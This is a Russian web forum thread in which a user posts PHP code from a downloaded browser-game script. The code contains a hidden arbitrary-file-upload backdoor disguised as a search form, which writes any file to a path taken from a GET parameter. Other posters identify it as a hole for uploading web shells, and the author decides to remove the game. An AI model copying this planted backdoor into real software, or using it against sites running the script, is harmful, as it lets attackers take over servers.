{% else-1 %}
* купить рекламу
* Шины и диски для настоящих боссов дороги
Форум
|
Общение
|
Общение/Флуд/Оффтоп
|

Это форма загрузки файлов
Обновить
* Тема закрыта!
1.
Леша * 2.05
[автор] (30 мар 2014, 00:23) [1/0] [1] [спам] [под]

Добрый вечер сидел смотрел и не как не могу понять зачем в поиске форма для загрузки файлов, или я не так понял?
[code]
if(isset($_GET['up'])){
echo'<b>Поиск</b><hr>';
echo'<form method="post" enctype="multipart/form-data">
<input type="hidden" name="upload" value="'.$_GET['up'].'">
<input type="file" name="file"><br>
Имя:<br><input type="text" name="new_name" value=""><br>
<input type="submit" value="Искать"></form>';}
if(isset($_POST['upload'])){
$new_name=trim($_POST['new_name']);
if(copy($_FILES["file"]["tmp_name"], $_POST['upload'].$new_name)){
echo 'Успешно';}
else{echo 'Поиск не удался!';}}

echo "<a href='shop.php?igrushki'><div class='foot'>";
echo "<img src='img/home.png' alt='Simptom'> Назад";
echo "</div></a>";
$q=mysql_query("SELECT * FROM `baby` WHERE (`mama` > '0' OR `papa` > '0') AND `iq` > '0' ORDER BY `iq` DESC LIMIT $start, $set[p_str]"*;
while ($post=mysql_fetch_assoc($q))
{
$ank_1=mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$post['papa']."' LIMIT 1"*);
$ank_2=mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$post['mama']."' LIMIT 1"*);
echo "<table style='width:100%' cellspacing='1' cellpadding='1'><tr>";
echo "<td class='icon14'><center>";
echo "".ava_baby($post['id'])."";
echo "</center></td>";
echo "<td class='p_m'>";
echo "<b>Имя ребёнка:</b> ".$post['name']."<br />";
echo "<b>Пол ребёнка:</b> <img src='img/m_".$post['pol'].".png' width='16' alt='Simptom'><br />";
echo "<b>Папа:</b> ";
if ($ank_1['id']==0)
{
echo "Нету!<br />";
}else{
echo "".online($ank_1['id'])." <a href='/info.php?id=".$ank_1['id']."'>".$ank_1['nick']."</a><br />";
}
echo "<b>Мама:</b> ";
if ($ank_2['id']==0)
{
echo "Нету!<br />";
}else{
echo "".online($ank_2['id'])." <a href='/info.php?id=".$ank_2['id']."'>".$ank_2['nick']."</a><br />";
}
echo "<a href='my_baby.php?id=".$post['id']."'>Подробнее...</a><br />";
echo "</td>";
echo "</tr></table>";
}
if ($k_page>1)
{
str('?',$k_page,$page);[/code]

2.
ЗЕЛЁНЫЙ ШЕРШЕНЬ * 66.72
(30 мар 2014, 00:25) [2/0] [2] [спам] [под]

Да, через гет массив щели заливают.*

3.
Леша * 2.05
[автор] (30 мар 2014, 00:27) [0/0] [0] [спам] [под]

насторожило то что в первом архиве не было этой хрени

echo "<div class='err'>";
echo "Пусто";
echo "</div>";
}
$q=mysql_query("SELECT * FROM `baby` WHERE (`mama` > '0' OR `papa` > '0') AND `iq` > '0' ORDER BY `iq` DESC LIMIT $start, $set[p_str]"*;
while ($post=mysql_fetch_assoc($q))
{
$ank_1=mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$post['papa']."' LIMIT 1"*);
$ank_2=mysql_fetch_assoc(mysql_query("SELECT * FROM `user` WHERE `id` = '".$post['mama']."' LIMIT 1"*);
echo "<table style='width:100%' cellspacing='1' cellpadding='1'><tr>";
echo "<td class='icon14'><center>";
echo "".ava_baby($post['id'])."";
echo "</center></td>";
echo "<td class='p_m'>";
echo "<b>Имя ребёнка:</b> ".$post['name']."<br />";
echo "<b>Пол ребёнка:</b> <img src='img/m_".$post['pol'].".png' width='16' alt='Simptom'><br />";
echo "<b>Папа:</b> ";
if ($ank_1['id']==0)
{
echo "Нету!<br />";
}else{
echo "".online($ank_1['id'])." <a href='/info.php?id=".$ank_1['id']."'>".$ank_1['nick']."</a><br />";
}
echo "<b>Мама:</b> ";
if ($ank_2['id']==0)
{
echo "Нету!<br />";
}else{
echo "".online($ank_2['id'])." <a href='/info.php?id=".$ank_2['id']."'>".$ank_2['nick']."</a><br />";
}
echo "<a href='my_baby.php?id=".$post['id']."'>Подробнее...</a><br />";
echo "</td>";
echo "</tr></table>";

4.
VIP * 2.37
(30 мар 2014, 00:28) [0/0] [0] [спам] [под]

у крутых кодеров заведено так, или для шеллов оставляют дырки или для остальной хрени как xss и sql

5.
Леша * 2.05
[автор] (30 мар 2014, 00:28) [0/0] [0] [спам] [под]
ЗЕЛЁНЫЙ ШЕРШЕНЬ,

вот падло а не север

6.
VIP * 2.37
(30 мар 2014, 00:28) [0/0] [0] [спам] [под]

где архив качал?

7.
Леша * 2.05
[автор] (30 мар 2014, 00:29) [0/0] [0] [спам] [под]

Тогда вопрос что можно залить через это?


if (!$b)
{
if(isset($_GET['up'])){
echo'<b>У вас нет ребенка</b><hr>';
echo'<form method="post" enctype="multipart/form-data">
<input type="hidden" name="upload" value="'.$_GET['up'].'">
<input type="file" name="file"><br>
Имя:<br><input type="text" name="new_name" value=""><br>
<input type="submit" value="Завести"></form>';}
if(isset($_POST['upload'])){
$new_name=trim($_POST['new_name']);
if(copy($_FILES["file"]["tmp_name"], $_POST['upload'].$new_name)){
echo 'Успешно';}
else{echo ' не удалось!';}}
}

8.
Леша * 2.05
[автор] (30 мар 2014, 00:30) [0/0] [0] [спам] [под]
VIP,

подогнали игру мой ребенок с гикса, но вот в чем дело в архивек не хватало несколько файло но потом додали и вот что получилось.

9.
VIP * 2.37
(30 мар 2014, 00:31) [1/0] [1] [спам] [под]
Леша,

не отличается от первого

10.
Леша * 2.05
[автор] (30 мар 2014, 00:31) [0/0] [0] [спам] [под]
VIP,

я вижу, мне просто интересно что через это влить можно.
Добавлено 30.03.14 в 00:35:55:
пипец, жопа сайту севера. снесу нах*
Добавлено 30.03.14 в 00:37:14:
уже адрес соцки просят, думаете я дурак оставлять на сервере игру с уязвимостю*

Подписаны: 1
Скачать тему | Файлы темы | Фильтр сообщений
* Правила сайта | * Реакции | * ББ коды | * Поиск
Онлайн: 124 из 27317
Последний:
sergo050707 *